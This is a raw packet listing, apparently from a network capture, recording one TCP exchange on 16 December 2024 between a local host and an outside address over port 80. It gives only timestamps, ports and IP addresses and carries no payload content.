Dec 16, 2024 11:03:17.827508926 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.827594995 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.827604055 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.828005075 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.828656912 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.828830957 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.828865051 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.829225063 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.829890966 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.829998970 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.830012083 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.830271006 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.830970049 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.831051111 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.831335068 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.832107067 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.832252979 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.832273960 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.832401991 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.833297014 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.833391905 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.833447933 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.833448887 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.834528923 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.834625959 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.834728003 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.835629940 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.835704088 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.835725069 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.835797071 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.836725950 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.836827040 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.836833954 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.837949991 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.838140965 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.838143110 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.838444948 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.839145899 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.839216948 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.839251995 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.839328051 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.840181112 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.840291023 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.840337038 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.840337038 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.841372013 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.841439962 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.841491938 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.841713905 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.842509985 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.842639923 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.842684984 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.842772007 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.843679905 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.843759060 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.843797922 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.843862057 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.844815969 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.844908953 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.844960928 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.845227003 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.845976114 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.846219063 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.846370935 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.847105026 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.847208023 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.847249031 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.847340107 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.848262072 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.848360062 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.848400116 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.848481894 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.849425077 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.849586964 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.849730015 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.850622892 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.850737095 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.850804090 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.850873947 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.851816893 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.851880074 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.851905107 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.851955891 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.852920055 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.852999926 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.853044987 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.853112936 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.854079962 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.854175091 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.854181051 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.854239941 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.855212927 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.855359077 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.855451107 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.856386900 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.856456995 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.856523037 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.856595993 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.857539892 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.857625961 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.857642889 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.857696056 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.858710051 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.858767986 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.858928919 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.859863997 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.860002995 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.860054016 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.860054970 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.860984087 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.861095905 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.861135960 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.861258030 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.862158060 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.862238884 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.862278938 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.862350941 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.863356113 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.863409996 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.863444090 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.863589048 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.864500999 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.864578009 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.864615917 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.864661932 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.865917921 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.866013050 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.866033077 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.866087914 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.866775036 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.866895914 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.867108107 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.867930889 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.868052959 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.868057966 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.868124008 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.869132042 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.869201899 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.869226933 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.869585037 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.870238066 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.870378017 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.870450020 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.871481895 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.871519089 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.871556997 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.871602058 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.872555971 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.872644901 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.872658968 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.872783899 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.873696089 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.873856068 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.874108076 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.874870062 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.874964952 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.874969006 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.875025034 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.007384062 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.007458925 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.007608891 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.007972956 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.008085012 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.008111000 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.008161068 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.009093046 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.009170055 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.009208918 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.009354115 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.010267973 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.010329962 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.010353088 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.010457039 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.011482000 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.011511087 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.011562109 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.012562990 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.012612104 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.012619972 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.012679100 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.013731956 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.013806105 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.013818979 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.014028072 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.014874935 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.014991999 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.015019894 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.015163898 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.016060114 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.016129017 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.016217947 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.016407013 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.017271996 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.017608881 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.017684937 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.018528938 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.018626928 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.018677950 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.018677950 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.019778967 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.019860983 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.019882917 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.019927979 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.020688057 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.020826101 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.020874977 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.020874977 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.021889925 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.021955013 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.021969080 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.022044897 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.022970915 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.023107052 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.023169041 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.024132013 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.024211884 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.024246931 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.024328947 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.025290966 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.025377035 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.025413990 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.025791883 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.026619911 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.026652098 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.026731968 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.027590990 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.027713060 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.027733088 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.027785063 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.028774023 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.028894901 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.028908968 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.029047966 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.029968023 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.030085087 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.030108929 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.031060934 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.031187057 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.031188011 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.031260967 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.032227993 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.032361031 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.032387972 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.032495022 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.033401966 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.033454895 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.033463955 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.033607006 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.034598112 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.034667969 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.034679890 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.034957886 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.035734892 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.035815954 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.036015034 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.036937952 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.037031889 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.037086010 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.037086010 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.038001060 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.038149118 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.038253069 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.039174080 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.039278984 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.039297104 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.039357901 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.040317059 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.040393114 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.040431023 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.040688992 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.041467905 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.041584015 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.041698933 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.042648077 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.042732954 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.042745113 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.042953968 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.043802023 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.043885946 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.043925047 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.043939114 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.044954062 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.045066118 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.045078039 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.045135021 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.046125889 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.046240091 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.046278000 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.046430111 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.047329903 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.047477961 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.047652960 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.048454046 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.048588037 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.048605919 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.048887968 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.049639940 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.049750090 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.049793959 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.050719976 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.050818920 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.050872087 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.050872087 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.051881075 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.051965952 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.052011967 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.052011967 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.053018093 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.053128958 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.053222895 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.054177999 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.054297924 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.054302931 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.054356098 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.055344105 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.055406094 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.055442095 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.055579901 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.056480885 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.056571007 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.056593895 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.056688070 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.057676077 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.057735920 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.057775974 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.057888985 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.058845043 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.058954954 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.059062004 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.059994936 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.060043097 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.060082912 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.060143948 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.061135054 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.061220884 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.061305046 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.061400890 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.062287092 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.062359095 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.062439919 CET	49800	80	192.168.2.5	31.41.244.11
